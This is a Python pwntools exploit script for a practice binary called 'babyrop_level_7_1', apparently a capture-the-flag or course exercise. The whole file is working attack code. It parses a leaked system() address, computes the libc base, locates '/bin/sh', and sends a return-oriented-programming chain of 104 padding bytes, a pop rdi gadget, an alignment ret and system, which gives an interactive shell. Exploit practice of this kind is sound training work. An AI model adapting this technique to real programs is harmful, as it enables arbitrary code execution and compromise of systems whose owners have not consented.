#!/usr/bin/python3

from pwn import *
import re

context.binary = target = ELF("./babyrop_level_7_1", checksec=False)
libc = target.libc
r = process()

# funcs
s = lambda a: r.sendline(a)

# gadgets
pop_rdi = 0x401ec3

# buf
r.recvuntil(b"[LEAK]")
system = int(re.findall(r'0x[a-z0-9]+', r.recvlineS())[0], 16)
log.info("system: %#x", system)
libc.address = system - libc.sym.system
log.info("libc: %#x", libc.address)
sh = next(libc.search(b"/bin/sh"))

# pop
buf = b"A"*104
buf += p64(pop_rdi)
buf += p64(sh)
buf += p64(pop_rdi+1)
buf += p64(system)
s(buf)

r.interactive()